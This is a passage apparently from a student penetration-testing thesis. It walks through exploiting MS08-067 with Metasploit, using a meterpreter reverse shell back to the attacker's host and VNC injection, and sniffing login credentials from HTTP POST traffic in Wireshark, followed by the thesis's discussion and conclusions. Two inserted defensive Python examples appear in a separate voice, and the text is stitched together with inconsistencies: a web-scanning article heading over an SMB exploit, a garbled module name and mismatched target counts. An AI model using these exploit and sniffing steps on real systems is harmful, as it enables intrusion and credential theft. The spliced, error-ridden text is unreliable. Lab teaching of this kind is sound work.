task to accomplish. We need to know much about the target. In this chapter I will
show you advanced techniques to get a shell on the target system and gain full
control over the victim system.

How to hack a server with Metasploit

By Sumedt Jitpukdebodin
Normally, a penetration tester or a hacker uses Metasploit to exploit vulnerable
services in the target server or to create a payload to make a backdoor in the hacked
server. But Metasploit has improved with many plugins and modules and now it can
do more than that. It can be used to pentest web applications too.
In this article, I will show you how to use Metasploit for scanning to get the
information of the web server and use Metasploit as a vulnerability assessment tool for web
applications.

4.2 Scanning Phase
The first thing when you want to hack a server is to get as much information about the target as
you can. So the first thing we must do is scan the server.
Metasploit has “db_nmap”, a module that is used to run nmap (the most famous
scanning tool), and when it gets the result from nmap, it puts the results into the
database which was created to keep the results. Follow these steps:

Step 1: Start the Kali Linux machine.

Step 2: Enter the command msfconsole to start Metasploit.
root@kali:~# msfconsole

Explain (Fig-4.1): This is the starting command of the Metasploit Framework on Kali Linux.

Fig-4.1: Msfconsole Start

Step 3: Search for netapi to find the exploit used against the Windows XP machine.
msf5 > search netapi
Step 4: Enter the command:
msf5 > use exploit/windows/smb/ms08_067_netapi

Explain (Fig-4.2): Now we search for the netapi exploit. We’ll be shown a number
of results, among which we’ll find the one below, and check whether it works.

Fig-4.2: Use MS08-067-netapi

Step 5: Enter the command show options. Now it's time to enter the victim IP address.
The command for that is:
msf5 > set RHOST enter_victim_ipaddress
Step 6: Load the exploit module to compromise the victim machine:
msf5 > set payload windows/meterpreter/reverse_tcp

Explain (Fig-4.3): The exploit is chosen and we need to set certain parameters for
this exploit.

Fig-4.3: Set Payload

Step 7: Set the attacker's IP address to get a reverse connection from the victim machine:
msf5 > set LHOST your_ipaddress
Explain (Fig-4.4): Set LPORT and LHOST, which are the port number and IP address of
the local machine/attacker machine.

Fig-4.4: Set Payload

Step 8: For example, run VNC.
We can inject a VNC server remotely using the Metasploit payload for VNC
injection.
Explain (Fig-4.5): Virtual Network Computing (VNC) is a graphical desktop
sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely
control another computer.

Fig-4.5: Run VNC

Explain (Fig-4.6): This is the victim machine.

Fig-4.6: Victim M/C

4.3 Packet Sniffers by Wireshark Tool

Step 1: Start Wireshark and capture traffic

In Kali Linux you can start Wireshark by going to
Application > Kali Linux > Top 10 Security Tools > Wireshark

In Wireshark go to Capture > Interface and tick the interface that applies to you. In
my case, I am using a Wireless USB card, so I’ve selected wlan0. [10]

Explain (Fig-4.7): When we launch Wireshark, a welcome screen lists the available
network connections on the current device. Displayed to the right of each is an
EKG-style line graph that represents live traffic on that network.

Fig-4.7: Run Wireshark

Ideally you could just press the Start button here and Wireshark will start capturing
traffic. In case you missed this, you can always capture traffic by going back to
Capture > Interface > Start

Explain (Fig-4.8): Start Wireshark by clicking on the Wireshark start icon. When
Wireshark starts it launches the following screen and provides the following ways to
capture network traffic.

Fig-4.8: Start Capturing

Step 2: Filter captured traffic for POST data

At this point Wireshark is listening to all network traffic and capturing it. I
opened a browser and signed in to a website using my username and password. When
the authentication process was complete and I was logged in, I went back and
stopped the capture in Wireshark.

When you type in your username and password and press the Login button, it generates
a POST request (in short, you’re sending data to the remote server).

To filter all traffic and locate POST data, type the following in the filter section:
http.request.method == "POST"
See the screenshot below. It is showing 1 POST event.

Explain (Fig-4.9): The most basic way to apply a filter is by typing it into the filter
box at the top of the window and clicking Apply (or pressing Enter). For example,
type “http” and you’ll see only HTTP packets. When we start typing, Wireshark will
help us auto-complete our filter.

Fig-4.9: HTTP Request
Step 3: Analyze POST data for username and password
Now click on that line of HTML Form URL Encoded.

Explain (Fig-4.10): The POST data is the result of the user's information: the email and
password form the different items.

Fig-4.10: Show POST Data
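What steps 2 and 3 show by hand in Wireshark, the POST filter and the decoding of the "HTML Form URL Encoded" line, is the check a defender runs over a capture of their own network to find applications that still accept logins over plain HTTP and must be moved to HTTPS. The Python script below is an added example, not code from the report or from the Wireshark project. It applies the equivalent of the display filter http.request.method == "POST" to constructed captured requests, decodes the form body, and reports which credential-like fields were visible on the wire while masking their values, since the report only needs to prove exposure, not repeat the secret. The requests, host name and form values are constructed.

```python
# Added example: the Wireshark filter of step 2 and the form decoding of step 3,
# run over captured HTTP request text to report cleartext logins without copying
# the secrets themselves. The captured requests below are constructed.
from urllib.parse import parse_qs

CAPTURED = [
    "GET /login HTTP/1.1\r\nHost: intranet.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "POST /login HTTP/1.1\r\nHost: intranet.example.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "email=alice%40example.com&password=Winter2019%21&remember=1",
    "POST /api/search HTTP/1.1\r\nHost: intranet.example.com\r\n"
    "Content-Type: application/json\r\n\r\n{\"q\": \"quarterly report\"}",
]

# Form field names that usually carry credentials (substring match, case-insensitive).
CREDENTIAL_HINTS = ("pass", "pwd", "secret", "token", "user", "email", "login")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def is_post(req):
    """Python equivalent of the display filter http.request.method == "POST"."""
    return req["method"] == "POST"


def mask(value):
    """Keep only the first character: enough to prove exposure, not to reuse the secret."""
    return value[:1] + "*" * (len(value) - 1) if value else ""


def cleartext_credentials(raw_requests):
    """One finding per form POST that carries credential-like fields over plain HTTP."""
    findings = []
    for raw in raw_requests:
        req = parse_request(raw)
        if not is_post(req):
            continue
        content_type = req["headers"].get("content-type", "")
        if not content_type.startswith("application/x-www-form-urlencoded"):
            continue  # only the "HTML Form URL Encoded" bodies seen in Wireshark
        form = parse_qs(req["body"])
        fields = {name: mask(values[0]) for name, values in form.items()
                  if any(hint in name.lower() for hint in CREDENTIAL_HINTS)}
        if fields:
            findings.append({"host": req["headers"].get("host", ""),
                             "path": req["path"], "fields": fields})
    return findings


if __name__ == "__main__":
    for finding in cleartext_credentials(CAPTURED):
        print(f"cleartext login form: http://{finding['host']}{finding['path']}")
        for name, masked in finding["fields"].items():
            print(f"  {name} = {masked}")
```

Each finding names a form that should be served and submitted over TLS only; the JSON request and the GET in the sample are ignored, exactly as the POST filter plus the form-encoded check would ignore them in Wireshark.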

CHAPTER 5

Discussion & Conclusion

5.1 Analysis and Discussion


This chapter sums up the results obtained during the penetration test in the network
laboratory, gives a brief overview of the necessity of having a penetration testing
methodology, and attempts to evaluate whether the goals and problem statement
given in the first chapter were satisfactorily addressed. This leads to a
discussion of the contributions made by this thesis work and of future work.

The intelligence gathering phase identified the machines that were reachable and the
ports open on them, and guessed the OS and services on those machines. Nmap
was the primary tool selected for the intelligence gathering phase. Nmap proved to be a
versatile tool which can perform different scans, ranging from ping scans to port scans
to OS and service fingerprinting. Initially Nmap was used to scan the entire
172.29.81.0/20 network range. This scan identified many hosts, of which only four
were targeted; the target machines identified had the IP addresses 172.29.81.2/20,
172.29.81.90/20 and 172.29.81.93/20. This result showed that ICMP packets within
the network were not blocked, and the scan result showed that all 1000 ports on the
identified machines were unfiltered, which meant that no firewalls or perimeter
devices were filtering the traffic to the target machines.
The detailed Nmap scans showing the open ports, closed ports and number of services
running on the machines are captured in Tables 4.17 and 4.18 respectively.
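The reasoning above, that ports reported as open or closed rather than filtered indicate no firewall in the path, applied automatically to Nmap grepable output, as an added example that is not the report's code. The scan lines are constructed for the report's lab range, not real output, and the set of states treated as filtered is an assumption.

```python
"""Find hosts that show no port filtering in Nmap grepable (-oG) output
(added example, not the report's code): the report reads all-open-or-
closed results as "no firewall or perimeter device in front of the
host", and this script applies that reading automatically. The scan
lines below are constructed for the report's lab range, not real output."""
import re

# Constructed -oG lines; "Ignored State" holds the ports Nmap summarised.
SAMPLE_OG = """\
# Nmap 7.70 scan initiated as: nmap -oG - 172.29.81.0/20
Host: 172.29.81.2 ()\tStatus: Up
Host: 172.29.81.2 ()\tPorts: 135/open/tcp//msrpc///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (998)
Host: 172.29.81.90 ()\tStatus: Up
Host: 172.29.81.90 ()\tPorts: 22/open/tcp//ssh///, 80/filtered/tcp//http///\tIgnored State: filtered (998)
# Nmap done -- 2 IP addresses (2 hosts up) scanned
"""

# port/state/protocol//service/// as Nmap writes each listed port
PORT_RE = re.compile(r"(\d+)/([\w|]+)/(\w+)//([^/]*)///")
IGNORED_RE = re.compile(r"Ignored State: ([\w|]+) \((\d+)\)")
# Port states that mean a device between scanner and host dropped probes
FILTERED_STATES = {"filtered", "open|filtered", "closed|filtered"}


def parse_grepable(text):
    """Map each host to a count of scanned ports per state."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        counts = hosts.setdefault(line.split()[1], {})
        for _port, state, _proto, _service in PORT_RE.findall(line):
            counts[state] = counts.get(state, 0) + 1
        bucket = IGNORED_RE.search(line)
        if bucket:  # the summarised ports all share one state
            state, n = bucket.group(1), int(bucket.group(2))
            counts[state] = counts.get(state, 0) + n
    return hosts


def hosts_without_filtering(hosts):
    """Hosts whose every scanned port was open or closed: nothing dropped
    the probes, so no firewall was observed in front of them."""
    return sorted(ip for ip, counts in hosts.items()
                  if not FILTERED_STATES & set(counts))
```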

The most interesting result was obtained from the main target machine when the Armitage
tool was used: Metasploit identified the vulnerable service through which the machine
could be compromised, revealing msf> use window.smb/ms08_067_netpati, which indicated
that 172.29.81.2 port 445 was vulnerable. Both Windows XP and
Windows 8 were running the default installation with no additional software installed
on the machines. In the laboratory network, both of these vulnerabilities were successfully
exploited using the Metasploit Framework through Armitage, which is the Metasploit
Framework's graphical interface, as shown in Figure 4.19.

5.2 Reflection on the Proposed Methodology
One of the goals set in this thesis was to identify how penetration testing is lawfully
conducted, in order to understand and analyze security issues pertaining to network systems as a
whole. To achieve this goal, a penetration testing methodology was proposed in
Section 4.1. Following this methodology, penetration tests were conducted against
the laboratory network. The laboratory network represented an internal network with a
few client and server machines. For network and system administrators, securing
the network and systems is an important task, to protect them from
outside as well as inside attacks. Security measures like firewalls and Intrusion
Detection Systems (IDS) help, but such measures are not always sufficient
in today's complex environment. A methodical penetration test complements
such security measures by testing whether the measures in place are good enough or
have flaws or misconfigurations.

The proposed methodology not only presented how network and system
administrators can utilize a penetration test but also showed the flow of the test
through each phase. It also showed how free or open source software can
effectively test networks and systems. These points were discussed in the literature
review and methodology chapters, which demonstrated how such tools complement an
administrator's efficiency at assessing the overall system security. The tools selected in
each phase of the proposed methodology were easy to install and configure, the
learning curve for using them was minimal, and no high-end
hardware was required to set up the penetration test.

The objective of the reconnaissance or information gathering phase was initially to map
the network, discover the reachable machines, and determine the open ports, services
and operating systems within the entire network segment. The objective of the scanning
and vulnerability assessment phase was to enumerate further and make use of
automation.

Scanners enhance the scanning and assessment and discover extra information
which might have been missed during the reconnaissance phase. Analysis of the results
or reports from the reconnaissance phase can provide deeper insight into the
network or system.

Such analysis helped further to find out what the real flaws were, whether
a faulty configuration or unpatched systems. The penetration testing
methodology was successful at achieving the objectives set for the scanning and vulnerability
assessment phase. From the pen-tester's perspective, one can ask whether the tester
should spend additional time performing such penetration testing. Results drawn from this
thesis showed that penetration testing had value when performed in a systematic and
methodical manner. Penetration testing is something that network and system
administrators have had to live without because of all the other activities they perform
to harden the system.

5.3 Contribution
Network administrators should be skilled at performing penetration testing in order to know
what flaws their network systems have. Not all network/system administrators can afford
to purchase commercial tools to perform penetration tests. In particular, for an
administrator who works in a medium or small organization, there will not always be a
separate budget to purchase tools or hire a third-party professional to perform
penetration tests. In such a situation this thesis work can provide baseline
information with all the tools and methodology. Any administrator can easily replicate
the same or a similar penetration testing environment, and the scope can be broadened
as required.
At present, most network/system administrators defend their networks or systems
using firewalls to block unidentified or malicious traffic, Intrusion Detection Systems
(IDS) to detect and respond to attacks, and anti-virus and anti-malware programs to alert
users about malicious software; the goal is to defend the system or network
from malicious users and intrusion attempts. All those measures are protective and
preventive in nature, and they can either succeed or fail depending on when they were released
and on current developments in technology. However, security should not only include
prevention and protection but also prediction and response.

This thesis also presented a prediction and response model, where phases like
intelligence gathering and scanning and vulnerability assessment can be used to
predict threats to the network or system, while phases like exploitation and reporting
provide the response required to counter the threats and loopholes. After a certain time,
a particular vulnerability or attack becomes obsolete, but the knowledge of how the software
responded to an attack of that kind can help in identifying similar behaviors in the
future.

5.4 Future Work

This work can be extended in different directions:

• Automation of the entire proposed penetration testing methodology to build a
complete security testing solution can be an extension of this thesis work.
This extension can empower the network and system administrators of small
and medium scale organizations to test and measure IT assets without any
hassle.
• This thesis can be extended to increase its efficiency if the human factor is also
considered during a penetration test. The focus of this thesis was on
finding and exploring the vulnerabilities related to computer networks.
However, employees within the organization are the weakest link in security,
so an effort can be made to integrate social engineering tools and techniques
into the existing penetration testing methodology.
• Computer users in the organization need to be trained to recognize the techniques
hackers use in reconnaissance.

5.5 Conclusion

After going through a deep study of penetration testing frameworks and analyzing the
various tools used, we have reached the following conclusions:

• Penetration testing provides the organization with a snapshot of the overall
security of the network infrastructure.
• A penetration testing process should be carried out with a proper manner and
methodology. The planning and analysis phase should be taken most
seriously, as everything done after it relies on this phase.
• The Metasploit/Armitage Framework is the best among all other commercial and
open source exploitation tools. Integrating Metasploit with various tools like
Nessus, Nmap and other third-party tools makes it very efficient. Various extensions
and commands are available in the Metasploit or Armitage framework which can be used
for post-exploitation.
• An automated penetration testing framework integrated with various third-party
tools works much faster than a manual testing framework.

This thesis explored and investigated the various network penetration testing tools
and methodologies. The main results are as follows:
• Designed and developed an enhanced framework for network penetration testing
over a personally built laboratory. This framework tries to find the
loopholes and vulnerabilities in the network and exploit them before
attackers do, and hence provides assurance of a secure network.
• Demonstrated the use of penetration testing over a campus network while
avoiding the unnecessary expense of professional testers, as they also follow the
same tools and techniques and are unreliable in nature.

The success of any penetration test depends on the underlying methodology. In order
to perform a successful penetration test, the underlying methodology should also make
use of different security tools. One of the goals set in this thesis was to examine
different security tools and techniques. Different tools like Nmap, Nessus, Armitage
and the Metasploit Framework were introduced first and examined. The selection of the
tools was based on their versatility, usability and effectiveness. With all the tools in
hand, each phase of the methodology was carried out in a systematic and methodical
manner. The selected tools were divided into three categories.
The reconnaissance or intelligence gathering phase covered the tools which assisted
in network profiling, network scanning, and operating system and service fingerprinting.
Nmap was identified as one of the best tools during this phase. The scanning and
vulnerability assessment phase covered the tools which allowed the exploration of
network and system vulnerabilities. The Metasploit Framework or Armitage was more
than a tool; it was a complete penetration testing framework, but it could also be used
as a tool during the exploitation and post-exploitation phases due to its abundance
of exploits, usability and effectiveness.
